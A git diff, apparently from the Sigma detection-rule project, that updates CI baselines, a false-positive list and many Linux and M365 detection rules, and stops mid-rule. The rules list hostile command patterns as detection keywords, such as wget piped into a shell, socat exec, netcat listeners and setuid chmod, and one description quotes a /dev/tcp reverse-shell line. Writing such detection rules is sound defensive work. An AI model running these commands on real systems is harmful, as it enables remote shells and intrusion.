diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index e29877a27..5b36cab65 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -5,17 +5,18 @@ db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;py db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;sharepointclient 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;odopen +1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;sysmon-intense\.xml -8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: evtx-PC +8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon) 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_ 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0 -162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer_Service\.exe -cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20.49.150.241 -bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151.101.64.223 +162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe +cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241 +bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;target\.exe 9494479d-d994-40bf-a8b1-eea890237021;Suspicious Add Scheduled Task Parent;TeamViewer_\.exe @@ -29,6 +30,7 @@ cfeed607-6aa4-4bbd-9627-b637deb723c8;New or Renamed User Account with '$' in Att 7b449a5e-1db5-4dd0-a2dc-4e3a67282538;Hidden Local User Creation;HomeGroupUser\$ 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6 +734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe @@ -36,3 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index f40ccf5ea..5cf624347 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -13,7 +13,7 @@ on: # yamllint disable-line rule:truthy - oscd env: - EVTX_BASELINE_VERSION: v0.6 + EVTX_BASELINE_VERSION: v0.7 jobs: test-sigma: @@ -132,3 +132,21 @@ jobs: ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ > findings.json - name: Show findings excluding known FPs run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv + check-baseline-win2022-0-20348-azure: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Download evtx-sigma-checker + run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + - name: Download and extract Windows 2022.0.20348 Azure baseline + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348-azure.tgz + - name: Remove deprecated rules + run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' + - name: Check for Sigma matches in baseline + run: | + chmod +x evtx-sigma-checker + ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ > findings.json + - name: Show findings excluding known FPs + run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv diff --git a/rules/cloud/m365/microsoft365_pst_export_alert.yml b/rules/cloud/m365/microsoft365_pst_export_alert.yml new file mode 100644 index 000000000..a9950ae28 --- /dev/null +++ b/rules/cloud/m365/microsoft365_pst_export_alert.yml @@ -0,0 +1,23 @@ +title: PST Export Alert +id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 +status: experimental +description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content +author: 'Sorina Ionescu' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1114/ +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'eDiscovery search started or exported' + status: success + condition: selection +falsepositives: + - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. +level: medium +tags: + - attack.collection + - attack.t1114 diff --git a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 70a8dec73..c49ea64da 100644 --- a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml +++ b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -5,21 +5,21 @@ author: 'Pawel Mazur' status: experimental date: 2021/11/18 references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ + - https://attack.mitre.org/tactics/TA0010/ + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection tags: - - attack.exfiltration - - attack.t1048.003 + - attack.exfiltration + - attack.t1048.003 falsepositives: - - Legitimate usage of wget utility to post a file -level: medium \ No newline at end of file + - Legitimate usage of wget utility to post a file +level: medium diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 2515f99b4..7e50f7619 100644 --- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -4,33 +4,33 @@ status: test description: 'Detects commandline operations on shell history files' author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2020/10/17 modified: 2021/11/27 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium tags: - - attack.credential_access - - attack.t1552.003 + - attack.credential_access + - attack.t1552.003 diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml index 44a5331c4..e31d748e5 100644 --- a/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/rules/linux/builtin/lnx_shell_susp_commands.yml @@ -4,56 +4,56 @@ status: test description: Detects suspicious shell commands used in various exploit codes (see references) author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ date: 2017/08/21 modified: 2021/11/27 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - '*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index 611227011..6b542f330 100644 --- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml @@ -3,21 +3,20 @@ id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 status: experimental description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md date: 2021/10/16 author: Florian Roth logsource: - product: linux - category: network_connection + product: linux + category: network_connection detection: - selection: - Image|endswith: '/bin/bash' - filter: - DestinationIp: - - '127.0.0.1' - - '0.0.0.0' - condition: selection and not filter + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: critical - diff --git a/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/rules/linux/process_creation/proc_creation_lnx_at_command.yml index 18c74f982..f3fd95576 100644 --- a/rules/linux/process_creation/proc_creation_lnx_at_command.yml +++ b/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -13,8 +13,8 @@ logsource: detection: selection: Image|endswith: - - '/at' - - '/atd' + - '/at' + - '/atd' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml index acbfecabe..21ed3909f 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml @@ -4,20 +4,20 @@ status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md date: 2020/10/19 modified: 2021/11/27 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low tags: - - attack.defense_evasion - - attack.t1027 + - attack.defense_evasion + - attack.t1027 diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..a58e96eb9 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: experimental +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - "IyEvYmluL2Jhc2" #!/bin/bash" + - "IyEvYmluL2Rhc2" #!/bin/dash" + - "IyEvYmluL3pza" #!/bin/zsh" + - "IyEvYmluL2Zpc2" #!/bin/fish + - "IyEvYmluL3No" # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1140 diff --git a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..42cdad2b6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml @@ -4,20 +4,20 @@ status: experimental description: Detects the usage of the unsafe bpftrace option author: Andreas Hunkeler (@Karneades) tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ date: 2022/02/11 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index e9c822de9..2f7690be4 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -4,21 +4,25 @@ status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + - '/more' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..2513bcf86 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml @@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: experimental +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index a3252ac28..115b209a0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -4,7 +4,7 @@ status: stable description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion author: Ömer Günal, oscd.community date: 2020/10/07 -modified: 2022/07/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -15,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index 03cace922..42f0e639b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -3,7 +3,7 @@ id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.defense_evasion @@ -20,6 +20,10 @@ detection: - 'rm -r /var/log/syslog' - 'rm -f /var/log/syslog' - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' - 'mv /var/log/syslog' - ' >/var/log/syslog' - ' > /var/log/syslog' diff --git a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index 8295856a4..c9c7a3f80 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -3,7 +3,7 @@ id: ec127035-a636-4b9a-8555-0efd4e59f316 status: experimental description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.collection @@ -14,19 +14,13 @@ logsource: product: linux category: process_creation detection: - selection1: + selection: Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' + CommandLine|contains|all: - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - 'clip' - selection4: - CommandLine|contains: '-o' - condition: all of selection* + - '-o' + condition: selection falsepositives: - Legitimate usage of xclip tools. level: low diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..454af266f --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -0,0 +1,21 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: experimental +description: Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index cc4e2eb28..4a66f1c96 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml @@ -3,36 +3,36 @@ id: 9069ea3c-b213-4c52-be13-86506a227ab1 status: experimental description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero date: 2021/10/26 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..580eece01 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: experimental +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low +tags: + - attack.command_and_control + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml index 34ac9dccd..85ee9c4e2 100644 --- a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml +++ b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -1,9 +1,10 @@ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable -description: Detects file deletion using "rm" or "shred" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity author: Ömer Günal, oscd.community date: 2020/10/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md logsource: @@ -14,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index d839d854b..fee4138fe 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -6,7 +6,7 @@ author: Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md date: 2020/10/08 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -16,9 +16,14 @@ detection: selection_2: CommandLine|contains: '''x:0:''' selection_3: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' CommandLine|contains: - '/etc/passwd' + - '/etc/shadow' - '/etc/sudoers' selection_4: Image|endswith: '/id' diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index aa30ec573..1bf72b8ea 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -6,7 +6,7 @@ author: Ömer Günal, Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -14,7 +14,11 @@ detection: selection_1: Image|endswith: '/groups' selection_2: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - 